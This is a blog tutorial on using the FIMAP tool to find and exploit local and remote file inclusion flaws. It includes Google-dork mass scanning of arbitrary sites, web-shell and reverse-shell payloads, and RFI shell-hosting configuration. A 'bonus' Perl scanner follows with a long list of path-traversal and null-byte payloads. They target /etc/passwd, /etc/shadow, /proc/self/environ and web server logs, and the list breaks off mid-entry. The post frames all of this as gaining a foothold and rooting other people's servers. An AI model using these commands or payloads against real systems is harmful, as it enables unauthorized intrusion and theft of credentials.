Friday, August 19, 2011

AUTOMATED LFI/RFI SCANNING & EXPLOITING WITH FIMAP

Today I am going to show you how to use a python based tool called FIMAP to perform automated LFI exploitation to gain shell access on our target site. LFI vulnerabilities are a bit like searching for SQL Injection vulnerabilities but more time consuming and these days there are fewer and fewer machines out there that are straight up vulnerable. FIMAP comes to our aid to take care of a lot of the manual effort which helps to speed things up and increase our chances of gaining remote shell access. The time it takes to manually craft the requests to test for LFI vulnerabilities is painstaking and this is why I find this tool to be extremely helpful. It automates the whole process and comes with built in exploits that actually work. It is capable of running single target scans, Google dork scans, and mass scans from a list file. It can also crawl a target site and create a list file which can be used afterwards with the mass scan mode. Here goes…

Pre-requisites:
·         Python installed on system already
·         Download copy of FIMAP here: http://code.google.com/p/fimap/downloads/list
·         Brain power & patience J

OK so assuming you already have Python installed you will download the latest version of FIMAP from its Google code home, extract to you desired location and then we can begin. You will need to open your command prompt and navigate to the extraction point (unless you added things to your global environment PATH). You can type “fimpay.py –h”  to see a quick overview of what options are available, should look like this:

It looks like a lot at first but once you review it is fairly easy to pick up on the syntax and options, as you will find most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs LFI check and audit against a single url. You just supply the URL to scan and it goes to work.

COMMAND: fimap.py –s –u http://target-site.com/index2.php?x=

If you are only going to be scanning a single target site then I highly suggest you run a scan using the Harvester mode first to help increase the chances of finding a vulnerable link. You can simply point FIMAP at the root directory of a site in Harvester mode and it will generate an output file for you to feed into the Mass scan. It looks like this:

COMMAND: fimap.py –H –u http://target-site.com/ -w output.txt
NOTE: you can define the crawl depth by adding the “-d <number of pages to crawl>” flag, as the default is set to 1

COMMAND: fimap.py –H –u http://target-site.com/ -d 3 –w output.txt

Now that we have our output file we can follow things up by switching to the Mass scan mode and audit all of the links we found when we used the Harvester mode. You just point it to the output.txt file from above steps and let it do its thing, like so:

COMMAND: fimap.py –m –l /path/to/list/output.txt


If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:

COMMAND: fimap.py –g –q inurl:index2.php?x=


It will run similar to the mass scan mode until it reaches the end of the results…
NOTE: You can further define the Google scan parameters by defining the time in between Google requests using “--googlesleep=<time>” and the pages to read for results from using “-p <page number>”. If you define the number of pages to return you can also add the number of results per page to use using “--results=<10,25,50,100>”, with 100 being the default value. The full syntax would look like this:

COMMAND: fimap.py –g –q inurl:index2.php?x= --googlesleep=5000 –p 15 –results=50

Now once you have run your scans you will be wondering where the results are stored. You can find them in two files, which you will need to search for on your system: fimap_results (xml) and fimap-log (txt). These two files contain the stored results from all of your scans. The location depends on what type of system you are using so just use the run box or the locate command to find them on your system. You can also type “-x” to see a list of possible targets to perform exploitation attempts against in a nice easy to follow interactive session:

COMMAND: fimap.py –x


 
Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:

Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell for which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell so you will not be able to use services like SSH but you can use it to gain foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is end results from successful exploit using the fimap shell:

You can also play with the configuration file so that you can add some additional features. Most notably you can add support to test for RFI vulnerabilities as well. You simply add you hosting details for your shell of choice into the “config.py” file, save, and then perform quick test to see if it is working. Here are the lines that need to be edited (editable fields in RED); I suggest using the FTP mode if you have the ability to host your shell somewhere:

# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None   # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"]   = None   # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:

COMMAND: fimap.py –test-rfi

This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool. I have also included a modified Perl script below which does some more thorough testing for file presence but is not nearly as full featured, nor is it the quietest tool. Please use responsibly and until next time, Enjoy!


BONUS PERL LFI SCRIPT:
Save the below as “file.pl” and then run using “perl file.pl” and then just enter your target site…

#!/usr/bin/perl
#modified by: Hood3dRob1n
use LWP::UserAgent;
use HTTP::Request;
system('clear','cls');
print "=======================================================\n";
print "=                                                                                                                    =\n";
print "=                                         LFI_scanner v 0.1.5                                           =\n";
print "=                                    ~[ HR Updated Version ]~                                     =\n";
print "=                                                                                                                   =\n";
print "=                input the site: www.memek.com/index.php?id=                        =\n";
print "=                                                                                                                   =\n";
print "=====================================================\n\n";
print '>';chomp($link = <STDIN>);
if($link !~ /http:\/\//) { $link = "http://$link"; }
#httpd type scan
print "\n>press [enter] to check the version of httpd[...]\n";
$httpd =<STDIN>;
$host = $link;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;
print "\n>press [enter] to check the vulnerability in lfi[...]\n";
$start =<STDIN>;
@vuls = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
